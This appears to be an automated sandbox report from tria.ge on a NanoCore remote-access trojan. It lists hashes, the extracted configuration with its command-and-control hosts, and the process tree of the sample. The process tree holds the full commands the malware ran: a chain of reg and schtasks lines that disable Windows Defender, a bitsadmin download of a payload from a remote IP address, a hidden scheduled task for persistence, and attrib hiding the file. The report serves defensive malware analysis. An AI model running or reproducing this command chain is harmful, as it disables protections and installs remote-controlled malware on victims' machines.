Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11/10/2023, 20:13
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230831-en
General
-
Target
tmp.exe
-
Size
314KB
-
MD5
0f82973b8fb033ddf1737a08ee7af0ad
-
SHA1
617aaac77fee3dcd155dae0207d45297563b9b91
-
SHA256
61dd71f5c77595869823f58be7c12eb1d2729d718880d596bf5ac54a789854d3
-
SHA512
1c66e5777cfb5b618fe24eaf4606f1ddf53448f3518ff235432b5a11ac01d471e62f2b8b34419584562cfd19d9fa9df52f89b6b1e91f828b944219789d35f001
-
SSDEEP
6144:2TouKrWBEu3/Z2lpGDHU3ykJotX+t41/GA:2ToPWBv/cpGrU3yVtX+t4VGA
Malware Config
Extracted
nanocore
1.2.2.0
mphlabs.ddns.net:8273
mphnewconn.ddns.net:8273
d198e7e6-5881-4519-8bb5-76dd9a9eb1e1
-
activate_away_mode
true
-
backup_connection_host
mphnewconn.ddns.net
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2022-02-10T07:10:50.745546436Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
8273
-
default_group
p-man
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
d198e7e6-5881-4519-8bb5-76dd9a9eb1e1
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
mphlabs.ddns.net
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2176 attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 1408 pnproc.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA pnproc.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 912 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1812 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2604 powershell.exe 1720 powershell.exe 1036 powershell.exe 1408 pnproc.exe 1408 pnproc.exe 1408 pnproc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1408 pnproc.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 1720 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 1408 pnproc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2992 wrote to memory of 2348 2992 tmp.exe 28 PID 2992 wrote to memory of 2348 2992 tmp.exe 28 PID 2992 wrote to memory of 2348 2992 tmp.exe 28 PID 2992 wrote to memory of 2348 2992 tmp.exe 28 PID 2348 wrote to memory of 2604 2348 cmd.exe 30 PID 2348 wrote to memory of 2604 2348 cmd.exe 30 PID 2348 wrote to memory of 2604 2348 cmd.exe 30 PID 2348 wrote to memory of 2604 2348 cmd.exe 30 PID 2348 wrote to memory of 2572 2348 cmd.exe 31 PID 2348 wrote to memory of 2572 2348 cmd.exe 31 PID 2348 wrote to memory of 2572 2348 cmd.exe 31 PID 2348 wrote to memory of 2572 2348 cmd.exe 31 PID 2348 wrote to memory of 2724 2348 cmd.exe 32 PID 2348 wrote to memory of 2724 2348 cmd.exe 32 PID 2348 wrote to memory of 2724 2348 cmd.exe 32 PID 2348 wrote to memory of 2724 2348 cmd.exe 32 PID 2348 wrote to memory of 2636 2348 cmd.exe 33 PID 2348 wrote to memory of 2636 2348 cmd.exe 33 PID 2348 wrote to memory of 2636 2348 cmd.exe 33 PID 2348 wrote to memory of 2636 2348 cmd.exe 33 PID 2348 wrote to memory of 2700 2348 cmd.exe 34 PID 2348 wrote to memory of 2700 2348 cmd.exe 34 PID 2348 wrote to memory of 2700 2348 cmd.exe 34 PID 2348 wrote to memory of 2700 2348 cmd.exe 34 PID 2348 wrote to memory of 2788 2348 cmd.exe 35 PID 2348 wrote to memory of 2788 2348 cmd.exe 35 PID 2348 wrote to memory of 2788 2348 cmd.exe 35 PID 2348 wrote to memory of 2788 2348 cmd.exe 35 PID 2348 wrote to memory of 2912 2348 cmd.exe 36 PID 2348 wrote to memory of 2912 2348 cmd.exe 36 PID 2348 wrote to memory of 2912 2348 cmd.exe 36 PID 2348 wrote to memory of 2912 2348 cmd.exe 36 PID 2348 wrote to memory of 2880 2348 cmd.exe 37 PID 2348 wrote to memory of 2880 2348 cmd.exe 37 PID 2348 wrote to memory of 2880 2348 cmd.exe 37 PID 2348 wrote to memory of 2880 2348 cmd.exe 37 PID 2348 wrote to memory of 2592 2348 cmd.exe 38 PID 2348 wrote to memory of 2592 2348 cmd.exe 38 PID 2348 wrote to memory of 2592 2348 cmd.exe 38 PID 2348 wrote to memory of 2592 2348 cmd.exe 38 PID 2348 wrote to memory of 2676 2348 cmd.exe 39 PID 2348 wrote to memory of 2676 2348 cmd.exe 39 PID 2348 wrote to memory of 2676 2348 cmd.exe 39 PID 2348 wrote to memory of 2676 2348 cmd.exe 39 PID 2348 wrote to memory of 2624 2348 cmd.exe 40 PID 2348 wrote to memory of 2624 2348 cmd.exe 40 PID 2348 wrote to memory of 2624 2348 cmd.exe 40 PID 2348 wrote to memory of 2624 2348 cmd.exe 40 PID 2348 wrote to memory of 2568 2348 cmd.exe 41 PID 2348 wrote to memory of 2568 2348 cmd.exe 41 PID 2348 wrote to memory of 2568 2348 cmd.exe 41 PID 2348 wrote to memory of 2568 2348 cmd.exe 41 PID 2348 wrote to memory of 2372 2348 cmd.exe 42 PID 2348 wrote to memory of 2372 2348 cmd.exe 42 PID 2348 wrote to memory of 2372 2348 cmd.exe 42 PID 2348 wrote to memory of 2372 2348 cmd.exe 42 PID 2348 wrote to memory of 2452 2348 cmd.exe 43 PID 2348 wrote to memory of 2452 2348 cmd.exe 43 PID 2348 wrote to memory of 2452 2348 cmd.exe 43 PID 2348 wrote to memory of 2452 2348 cmd.exe 43 PID 2348 wrote to memory of 2448 2348 cmd.exe 44 PID 2348 wrote to memory of 2448 2348 cmd.exe 44 PID 2348 wrote to memory of 2448 2348 cmd.exe 44 PID 2348 wrote to memory of 2448 2348 cmd.exe 44 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2176 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\newtake.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -file newtake.bat3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:2572
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:2724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:2636
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:2700
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2788
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2912
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2880
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2592
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2676
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:2624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:2568
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:2484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:2528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:2576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:2888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:2892
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:3020
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:2904
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:2432
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:2388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath c:\users\public\documents3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "pnproc.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
C:\Windows\SysWOW64\Dism.exeDISM /Online /Enable-Feature /FeatureName:NetFx3 /All3⤵
- Drops file in Windows directory
PID:1736
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer debjob /download /priority foreground http://147.182.135.152:80/dload/pnproc.exe "c:\users\public\documents\pnproc.exe"3⤵
- Download via BitsAdmin
PID:1812
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS.exe /CREATE /SC ONLOGON /TN "\Microsoft\Windows\Sysmain\DiskCleanup" /RL HIGHEST /TR "c:\users\public\documents\pnproc.exe"3⤵
- Creates scheduled task(s)
PID:912
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS.exe /run /TN "\Microsoft\Windows\Sysmain\DiskCleanup"3⤵PID:932
-
-
C:\Windows\SysWOW64\attrib.exeattrib "c:\users\public\documents\pnproc.exe" +r +a +s +h3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2176
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {402526E9-5AE2-4FC0-A29B-FD304B4FD408} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]1⤵PID:2380
-
\??\c:\users\public\documents\pnproc.exec:\users\public\documents\pnproc.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD59c90c85d4d83e0008aea8410f1b5794e
SHA1e0df27ed158298bf431ca87a696aa84104655ad2
SHA25698a56eea405af1a993ed4ab90a7bd1f02ce482c6b0730cc274c61c771fb828b1
SHA512f329d2fb059b054e4b03d19007552248c7be6390e249c202879bcf09e4a1cd55848d1e6da81ebecaba4084ab6a1a31f359a11f6c49b432960c70fbd783adbb29
-
Filesize
3KB
MD59c90c85d4d83e0008aea8410f1b5794e
SHA1e0df27ed158298bf431ca87a696aa84104655ad2
SHA25698a56eea405af1a993ed4ab90a7bd1f02ce482c6b0730cc274c61c771fb828b1
SHA512f329d2fb059b054e4b03d19007552248c7be6390e249c202879bcf09e4a1cd55848d1e6da81ebecaba4084ab6a1a31f359a11f6c49b432960c70fbd783adbb29
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1OWO6TG1HVBXJ8NL0U1S.temp
Filesize7KB
MD52437b3c02e8733c5136a6fcf84ddd613
SHA1477a6e824522f467f0e5532721f6edb79ea441bc
SHA2563f3a18a2f373600b4c31bdd037250b5ccc3c8e958cdd32cbc02dc7e4951f7afa
SHA512bf0b2465458517b1e9caf4f9445d6ec35a00f1c18e11aaa1acb029ede7e28607e565284775cd5ddd2d2b0ac01df4f9c15a201a9acc948f0787782b94472e4255
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD52437b3c02e8733c5136a6fcf84ddd613
SHA1477a6e824522f467f0e5532721f6edb79ea441bc
SHA2563f3a18a2f373600b4c31bdd037250b5ccc3c8e958cdd32cbc02dc7e4951f7afa
SHA512bf0b2465458517b1e9caf4f9445d6ec35a00f1c18e11aaa1acb029ede7e28607e565284775cd5ddd2d2b0ac01df4f9c15a201a9acc948f0787782b94472e4255
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD52437b3c02e8733c5136a6fcf84ddd613
SHA1477a6e824522f467f0e5532721f6edb79ea441bc
SHA2563f3a18a2f373600b4c31bdd037250b5ccc3c8e958cdd32cbc02dc7e4951f7afa
SHA512bf0b2465458517b1e9caf4f9445d6ec35a00f1c18e11aaa1acb029ede7e28607e565284775cd5ddd2d2b0ac01df4f9c15a201a9acc948f0787782b94472e4255
-
Filesize
202KB
MD543fcea4b740c2daba3271f7992184932
SHA10bca68ff32d5fb9a665b6db2b654ae7a87d4089f
SHA2563d933566f692fc9709a5c290d541ca65d794e3a0f66f279f71ed97d07aa16e71
SHA512fa7b939a8a01b5e016e18b82177f4f3170afb74049f20025f9ff1df25fc4b007a921567c1b9dcee132e040fbbdd322e33020c9fde91cccd704e47a4115e1c85b